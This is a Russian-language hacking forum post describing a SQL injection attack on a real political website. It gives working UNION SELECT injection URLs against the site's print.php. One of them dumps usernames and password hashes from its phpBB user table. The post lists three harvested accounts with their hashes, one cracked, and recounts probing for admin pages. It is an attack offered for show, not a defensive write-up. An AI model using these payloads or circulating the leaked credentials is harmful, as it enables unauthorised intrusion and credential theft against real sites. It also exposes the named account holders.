Сообщение от
Twoster
http://www.democracy.ru/print.php?id=-1+union+select+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15/*
Итак приступим.
Версия 5 на серве стоит пошарив по сайту нашел пхпббшный форум так что иньекция была проведена буквально за пару секунд запросом
Код:
http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users+limit+1,1/*
Откуда посыпались акки как переспелые мандарины с дерева ))) взял я все три акка которые были в базе и моим уловом стал
Andrey:2c44e4b135929e56f778fadc97077465
Елена Алексеенко:ffae0a5ec97c310be6bb424a35d03 cfc
Kremniov:c4ca4238a0b923820dcc509a6f75849b
Начал проганять хеши через сервисы и только последний был взломан
Kremniov:1
попробовав пробить форум на login.php или admin.php я получил кулаком в лоб ни то ни другое не было найдено в дело пошел сканнер и выдал чтото в виде
Код:
http://www.democracy.ru/admin/
но и тут меня ждало разочарование юзалась примитивная basic аутидентификация ни логин ни пароль от того что имелось не было...
А с форумом меня радости не ждало т.к. логин страница была удалена (и нафига им это хотя у них весь форум в спаме...)
P.S.Также я прошелся по таблицам в поисках чего нибудь вкусного сразу говорю ниче интересного вы там не найдете (150 таблиц всякого мусора )))